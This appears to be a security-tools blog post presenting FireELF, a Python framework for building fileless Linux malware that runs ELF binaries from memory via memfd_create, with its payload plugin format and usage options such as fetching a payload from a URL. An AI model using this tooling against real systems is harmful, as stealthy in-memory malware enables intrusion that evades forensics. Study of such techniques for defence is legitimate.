FireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads.
By default is comes with ‘memfd_create’ which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.
Also Read – InstantBox : Get a Clean, Ready-To-Go Linux Box in Seconds
Features
Included payload memfd_create
The only included payload ‘memfd_create’ is based on the research of Stuart, this payload creates an anonymous file descriptor in memory it then uses fexecve to execute the binary directly from the file descriptor.
This allows for the execution completely in memory which means that if the linux system gets restarted, the payload will be no where to be found.
Creating a Payload
By default fireELF comes with ‘memfd_create’ but users can develop their own payloads.
By default the payloads are stored in payloads/ and in order to create a valid payload you simply need to include a dictonary named ‘desc’ with the parameters ‘name’, ‘description’, ‘archs’, and ‘python_vers’. An example desc dictonary is below:
desc = {“name” : “test payload”, “description” : “new memory injection or fileless elf payload”, “archs” : “all”, “python_vers” : “>2.5”}
In addition to the ‘desc’ dictonary the entry point the plugin engine i built uses requires a main function which will automatically get passed two parameters, one is a boolean that if its true it means its getting passed a url the second parameter it gets passed is the data. An example of a simple entry point is below:
def main(is_url, url_or_payload):
return
If you have a method feel free to commit a payload!
Installation
Download the dependencies by running:
pip3 -U -r dep.txt
fireELF is developed in Python 3.x.x
Usage
usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME]
(-u PAYLOAD_URL | -e EXECUTABLE_PATH)
fireELF, Linux Fileless Malware Generator
optional arguments:
-h, –help show this help message and exit
-s Supress Banner
-p PAYLOAD_NAME Name of Payload to Use
-w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if
You’re not Using the Paste Site Option)
-u PAYLOAD_URL Url of Payload to be Executed
-e EXECUTABLE_PATH Location of Executable
Screenshots
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…